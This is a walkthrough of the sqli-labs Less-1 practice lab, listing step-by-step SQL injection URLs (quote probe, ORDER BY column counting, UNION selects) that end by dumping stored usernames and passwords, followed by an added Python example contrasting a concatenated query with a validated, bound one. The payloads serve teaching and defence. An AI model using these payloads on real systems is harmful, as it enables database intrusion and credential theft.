sqli-labs Walkthrough: Less-1

Online practice site: http://43.247.91.228:84/

First, open sqli-labs Less-1.

Enter http://43.247.91.228:84/Less-1/?id=1

Enter http://43.247.91.228:84/Less-1/?id=1'

Test with "and 1=1" and "and 1=2"; the results show that this is a string-type (character) injection.
http://43.247.91.228:84/Less-1/?id=1'and 1=1--+
http://43.247.91.228:84/Less-1/?id=1'and 1=2 --+

Use order by to find the number of columns
http://43.247.91.228:84/Less-1/?id=1'order by 3--+

http://43.247.91.228:84/Less-1/?id=1'order by 4--+
The result shows that there are three columns.

Next, use a union to show which positions are echoed back
http://43.247.91.228:84/Less-1/?id=55'union select 1,2,3--+

View the current database name:
http://43.247.91.228:84/Less-1/?id=55'union select 1,(select database()),3--+

View the database version:
http://43.247.91.228:84/Less-1/?id=55'union select 1,(select version()),3--+

List the database names:
http://43.247.91.228:84/Less-1/?id=55'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

List the tables in the security database:
http://43.247.91.228:84/Less-1/?id=55'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

List all columns of the users table:
http://43.247.91.228:84/Less-1/?id=55'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+

List the usernames and passwords:
http://43.247.91.228:84/Less-1/?id=13' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Bingo!!!
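
Why the probes in this walkthrough behave as they do, and how validating and binding the id removes every one of those differences, shown as an added example that is not part of the original post or of the sqli-labs code. Assumptions: the lesson places id inside single quotes in a concatenated query, sqlite3 stands in for the lab's MySQL so the block runs offline, and the table rows and function names are constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed sample rows; sqlite3 stands in for the lab's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_vulnerable(db, raw_id):
    """Concatenates raw_id into the statement, so a quote in it ends the string literal."""
    sql = "SELECT id, username, password FROM users WHERE id='" + raw_id + "' LIMIT 0,1"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Returning the database error to the caller is what makes the
        # single-quote and order-by probes informative.
        return "SQL error: %s" % exc

def lookup_safe(db, raw_id):
    """Accepts only ASCII digits, then binds the value as a parameter."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        return []
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 0,1"
    return db.execute(sql, (int(raw_id),)).fetchall()

# id values taken from the URLs in the walkthrough, decoded the way the
# server receives them ("+" in a query string becomes a space).
PROBES = [unquote_plus(p) for p in (
    "1", "1'", "1'and 1=1--+", "1'and 1=2 --+",
    "1'order by 3--+", "1'order by 4--+", "55'union select 1,2,3--+")]

def compare(db):
    """Returns (probe, vulnerable result, hardened result) for each probe."""
    return [(p, lookup_vulnerable(db, p), lookup_safe(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, vuln, safe in compare(make_db()):
        print(repr(probe), "| concatenated:", vuln, "| bound:", safe)
```

With the concatenated query each probe gives a different answer (a row, no row, or a database error); with the bound query every value other than a plain number returns the same empty result.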
